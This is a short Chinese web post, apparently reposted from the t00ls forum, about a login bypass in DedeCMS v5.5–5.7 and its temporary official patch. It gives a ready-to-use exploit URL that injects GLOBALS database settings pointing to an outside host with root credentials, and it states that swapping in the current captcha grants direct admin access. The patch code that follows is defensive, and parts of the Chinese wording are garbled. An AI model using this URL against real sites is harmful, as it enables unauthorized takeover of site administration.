DedeCMS v5.5-5.7 登录绕过

破绽复现

http://www.yousite.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面validate=dcug改为当前的考证码,即可直接进入网站后台

此破绽的前提是必需得到后台途径才干完成
 


 

官方暂时处理方法

找到include/common.inc.php文件,把:

    foreach($_REQUEST as $_k=>$_v)
    {
        var_dump($_k);
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
        {
            exit('Request var not allow!');
        }
    }

换成:

    //检查和注册外部提交的变量
    function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                CheckRequest($_k);
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
            {
                exit('Request var not allow!');
            }
        }
    }
    CheckRequest($_REQUEST);

Form:t00ls

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片